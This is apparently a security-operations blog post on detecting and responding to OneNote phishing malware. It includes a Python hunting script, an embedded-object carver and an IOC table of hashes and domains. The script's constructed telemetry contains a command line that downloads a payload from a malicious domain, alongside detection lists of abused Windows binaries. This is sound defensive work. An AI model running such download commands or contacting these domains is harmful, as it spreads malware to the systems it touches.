Stories from the SOC: OneNote MalSpam – Detection & response

This blog was co-written with Kristen Perreault – Professional Cybersecurity and James Rodriguez – Sr. Specialist Cybersecurity.

Executive summary

Since December 22nd, 2022, there has been an increase in malware delivered by phishing emails carrying a OneNote attachment. As with most phishing emails, the end user opens the attachment, but unlike Microsoft Word or Microsoft Excel, OneNote does not support macros, which is how threat actors previously launched scripts to install malware; here the attachment instead hides something the user is lured into clicking.

Little documentation exists on the tactics, techniques, and procedures (TTPs) observed in these attacks. Some of the TTPs observed included execution of powershell.exe and curl.exe once a hidden object in the note was run. Once the hidden executable was clicked, a connection was made to an external site to attempt to download and execute malware. Once running, the attacker drops additional malicious files and gathers internal information from within the organization. In this case, the malicious files were detected and mitigated by SentinelOne.

Investigation

Initial Alarm Review

Indicators of Compromise (IOC)

The initial alarm came in for malware detected by SentinelOne, a file of the .one type. The file's source being Outlook indicated this was likely a phishing email. Shortly after receiving the initial alarm, the MES SOC Threat Hunters (SECTOR team) were alerted by a customer experiencing this activity and began their deep dive. Looking up the file hash obtained from the SentinelOne event revealed no discernible information about the file's purpose. This prompted SECTOR to use Deep Visibility to gain further insight into the process and purpose of the detected file.

Deep Visibility is a feature within SentinelOne that provides comprehensive insight into the actions and behaviors of threats within a network environment. It allows security teams such as SECTOR to investigate and respond to threats by giving better insight into processes, network connections, and file actions. It is an extremely powerful tool in SentinelOne and is commonly used during the incident response process.

[Image: SentinelOne Deep Visibility, redacted]

Expanded investigation

Events Search

A search string was created for Deep Visibility that included the file name and associated file hashes. An event in SentinelOne was found that included a curl.exe process reaching the external domain minaato[.]com. On further review the domain turned out to be a file sharing site, and additional malicious indicators were uncovered. Analyzing the DNS request to minaato[.]com showed events with the source process mshta.exe, the target process curl.exe, and the parent process onenote.exe. This process chain carried the heuristic (behavioral) attributes that caused SentinelOne to fire an alert. Using these TTPs and the previously seen source processes, a new query was generated to find any other file producing the same activity. This led SECTOR to detect another file under the name Cancellation[.]one.

Event Deep Dive

SECTOR began the event deep dive with an initial IOC-based search query that included the file name and the domain that generated outbound network connections.

Pivoting off the results of the initial IOC-based search query, SECTOR created a secondary search query that included the multiple file names, domains, and hashes that had been found. These IOCs had not previously been reported in the wild; once found, SECTOR provided them to the AT&T Alien Labs team for additional detection engines, correlation rules, and OTX (AT&T Open Threat Exchange platform) pulse updates.

After gathering all of the IOCs, a third, heuristic-based search query was created. This query aimed to find any remaining events related to the malware that SentinelOne might not have alerted on, since SentinelOne primarily focuses on execution-based actions rather than behavior-based ones. This demonstrates the importance of pairing threat hunting with SentinelOne's Deep Visibility feature for better coverage.

[Image: SECTOR working]

In the final stage of the event search, SECTOR created a closing heuristic search query that detected any outreach to a domain with the same behavioral attributes observed in this environment. Although the results contained false positives, the team was able to sift through them and find an event in which a ping.exe command successfully communicated with the malicious domain minaato[.]com. SentinelOne did not alert on this activity because ping.exe is a common, legitimate process execution, which is exactly why the behavioral query was needed.

[Image: heuristic query]
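The three hunts described above (a match on known IOCs, the onenote.exe process chain, and any network outreach from a process running under onenote.exe, which is what surfaced the ping.exe event SentinelOne stayed quiet on) can be written as a few rules over process-creation and DNS telemetry. The following is an added example written for this page, not SECTOR's Deep Visibility query or any SentinelOne code: it runs over a small constructed event set in a simplified schema (pid, ppid, image, command line, DNS query). The file names, command lines and URL path in the sample are invented; only the domains come from the IOC table further down.

```python
import json
from collections import defaultdict

# Domains from this page's IOC table (defanging brackets removed).
IOC_DOMAINS = {"minaato.com", "simonoo.com", "olimobile.com", "sellscentre.com"}

# Binaries the page reports being spawned under onenote.exe. They are only
# suspicious when onenote.exe is an ancestor; a bare ping.exe or curl.exe is noise.
LOLBINS = {"mshta.exe", "curl.exe", "powershell.exe", "ping.exe"}
LURE_PARENT = "onenote.exe"

# Constructed sample telemetry (not real SentinelOne data). Paths and file names
# are invented; pid 700 is a benign ping that must not be flagged.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100, "image": "ONENOTE.EXE", "cmdline": 'ONENOTE.EXE "cancelation.one"'},
    {"type": "process", "pid": 300, "ppid": 200, "image": "mshta.exe", "cmdline": "mshta.exe open.hta"},
    {"type": "process", "pid": 400, "ppid": 300, "image": "curl.exe", "cmdline": "curl.exe -o payload.exe http://minaato.com/dl"},
    {"type": "dns", "pid": 400, "query": "minaato.com"},
    {"type": "process", "pid": 500, "ppid": 200, "image": "ping.exe", "cmdline": "ping.exe -n 1 minaato.com"},
    {"type": "dns", "pid": 500, "query": "minaato.com."},
    {"type": "process", "pid": 600, "ppid": 100, "image": "chrome.exe", "cmdline": "chrome.exe"},
    {"type": "dns", "pid": 600, "query": "www.microsoft.com"},
    {"type": "process", "pid": 700, "ppid": 100, "image": "ping.exe", "cmdline": "ping.exe 10.0.0.1"},
    {"type": "dns", "pid": 700, "query": "10.0.0.1.in-addr.arpa"},
]


def build_tree(events: list) -> dict:
    """pid -> (lower-cased image name, parent pid) from process-creation events."""
    return {e["pid"]: (e["image"].lower(), e["ppid"]) for e in events if e["type"] == "process"}


def ancestry(tree: dict, pid: int, limit: int = 32) -> list:
    """Image names from the process itself up to the root (bounded against pid cycles)."""
    chain = []
    while pid in tree and len(chain) < limit:
        image, ppid = tree[pid]
        chain.append(image)
        pid = ppid
    return chain


def hunt(events: list) -> list:
    """Apply the three hunts from the write-up and return one finding per (rule, event)."""
    tree = build_tree(events)
    findings = []
    for e in events:
        chain = ancestry(tree, e["pid"])
        # chain[0] is the process itself; onenote.exe is only interesting as an ancestor.
        under_onenote = LURE_PARENT in chain[1:]
        if e["type"] == "process":
            if chain[0] in LOLBINS and under_onenote:
                findings.append({"rule": "onenote_lolbin_chain", "pid": e["pid"],
                                 "chain": " <- ".join(chain), "cmdline": e["cmdline"]})
        elif e["type"] == "dns":
            domain = e["query"].lower().rstrip(".")
            if domain in IOC_DOMAINS:
                findings.append({"rule": "ioc_domain", "pid": e["pid"],
                                 "chain": " <- ".join(chain), "domain": domain})
            # The behavioral catch-all: any resolution from under onenote.exe, whatever the
            # domain and whatever the binary (this is what catches ping.exe).
            if under_onenote:
                findings.append({"rule": "onenote_child_network", "pid": e["pid"],
                                 "chain": " <- ".join(chain), "domain": domain})
    return findings


def findings_by_rule(findings: list) -> dict:
    """Collapse findings to rule -> sorted list of distinct pids for triage."""
    by_rule = defaultdict(set)
    for f in findings:
        by_rule[f["rule"]].add(f["pid"])
    return {rule: sorted(pids) for rule, pids in by_rule.items()}


if __name__ == "__main__":
    print(json.dumps(hunt(SAMPLE_EVENTS), indent=2))
    print(json.dumps(findings_by_rule(hunt(SAMPLE_EVENTS))))
```

Feeding real telemetry means mapping your EDR's process and DNS events into the same three fields; the rule logic does not change. Note that the catch-all rule will include the same false positives SECTOR had to sift through, so it is a hunting query, not an alerting rule.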

Response

Building the Investigation

After gathering all necessary information and event findings, SECTOR was able to pull the malicious OneNote file and detonate it in their sandbox environment. They could then see that, once the file was opened, the malicious link was hidden under an overlaid stock Microsoft image that asked the user to click Open. Clicking it took the user to the malicious domain, minaato[.]com.
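The lure described above is a clickable object hidden under a stock image, and the onenote.exe to mshta.exe chain seen earlier is consistent with a script object embedded in the note. OneNote stores embedded files as FileDataStoreObject structures (documented in MS-ONESTORE), which can be carved out of a .one file before detonation by scanning for their header GUID. The following is an added example, not SECTOR's tooling: it carves and fingerprints embedded objects from a constructed .one-like byte string (a PNG-looking decoy, an HTA-looking placeholder script, and a dangling header to exercise the truncation path). Nothing is claimed about the real attachment's contents beyond what the page states.

```python
import hashlib
import struct

# GUIDs of the FileDataStoreObject structure from MS-ONESTORE, written as the
# 16 little-endian bytes that actually appear in the file.
FDSO_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")  # {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}
FDSO_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")  # {71FBA722-0F79-4A0B-BB13-899256426B24}
# After the header GUID: cbLength (u64) | unused (u32) | reserved (u64) | FileData | footer GUID
FDSO_DATA_OFFSET = 16 + 8 + 4 + 8


def classify(payload: bytes) -> str:
    """Rough content sniffing so the analyst sees what was embedded, not just bytes."""
    head = payload[:512]
    low = head.lower()
    if head.startswith(b"MZ"):
        return "pe"
    if head.startswith(b"\x89PNG"):
        return "png"
    if head.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if b"<hta:application" in low or b"<script" in low:
        return "hta/html script"
    if b"powershell" in low or low.lstrip().startswith(b"@echo"):
        return "batch/powershell script"
    return "unknown"


def carve_embedded_files(data: bytes) -> list:
    """Return one record per FileDataStoreObject whose declared length fits in the buffer."""
    found = []
    pos = data.find(FDSO_HEADER)
    while pos != -1:
        start = pos + FDSO_DATA_OFFSET
        if start > len(data):
            break  # header at the very end, no length field to read
        (length,) = struct.unpack_from("<Q", data, pos + 16)
        end = start + length
        if end + len(FDSO_FOOTER) > len(data):
            # Bogus or truncated length: skip this header and keep scanning.
            pos = data.find(FDSO_HEADER, pos + 1)
            continue
        # The footer GUID should follow the data; tolerate a few bytes of alignment padding.
        footer_ok = any(data[end + pad:end + pad + 16] == FDSO_FOOTER for pad in range(8))
        payload = data[start:end]
        found.append({
            "offset": start,
            "size": length,
            "kind": classify(payload),
            "sha256": hashlib.sha256(payload).hexdigest(),
            "footer_ok": footer_ok,
        })
        pos = data.find(FDSO_HEADER, end)
    return found


def make_fdso(payload: bytes) -> bytes:
    """Encoder used only to build the constructed sample; the inverse of the carver."""
    return FDSO_HEADER + struct.pack("<QIQ", len(payload), 0, 0) + payload + FDSO_FOOTER


# Constructed sample (not a real OneNote file and not the real lure): a PNG-looking
# decoy image, an HTA-looking script with a placeholder body, filler bytes, and a
# dangling header whose length field points far past the end of the buffer.
DECOY_IMAGE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
LURE_SCRIPT = (b'<html><head><HTA:APPLICATION ID="x"/></head>'
               b"<script language=\"VBScript\">' placeholder</script></html>")
DANGLING = FDSO_HEADER + struct.pack("<Q", 2 ** 40)
SAMPLE_ONE = (b"FILLER" * 8 + make_fdso(DECOY_IMAGE) + b"\x00" * 16
              + make_fdso(LURE_SCRIPT) + DANGLING)


if __name__ == "__main__":
    for obj in carve_embedded_files(SAMPLE_ONE):
        print(f"{obj['offset']:#08x} {obj['size']:6d} {obj['kind']:<24} "
              f"sha256={obj['sha256']} footer_ok={obj['footer_ok']}")
```

Against a real attachment, call carve_embedded_files(open(path, "rb").read()); the hashes of the carved objects are what to look up and share when, as in this case, the hash of the container itself returns nothing.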

SECTOR provided all data gathered from this threat hunt to the affected customers and to fellow cybersecurity teams within AT&T for situational awareness.

Customer interaction

The affected customers were given remediation steps based on the specific activity they experienced with this malware. Some were successfully compromised, while others avoided any execution or downloads associated with the malware. The remediation steps included removing all related files from the affected devices, resetting all user passwords as a best practice, scanning assets to ensure no further unauthorized or malicious activity was occurring in the background, globally blocking all IOCs, and implementing block rules on their firewalls.

IOCs

IOC Type            IOC
File Name           cancelation.one
File Hash (MD5)     670604eeef968b98a179c38495371209
File Hash (SHA1)    8f4fc0dbf3114200e18b7ef23f2ecb0b31a96cd7
File Hash (SHA1)    776181d69149f893e9b52d80908311c0f42ec5eb
File Hash (SHA1)    202b7c6c05c1425c8c7da29a97c386ede09f1b9f
File Hash (SHA256)  83f0f1b491fa83d72a819e3de69455a0b20c6cb48480bcd8cc9c64dbbbc1b581
Domain Name         minaato[.]com
Domain Name         simonoo[.]com
Domain Name         olimobile[.]com
Domain Name         sellscentre[.]com
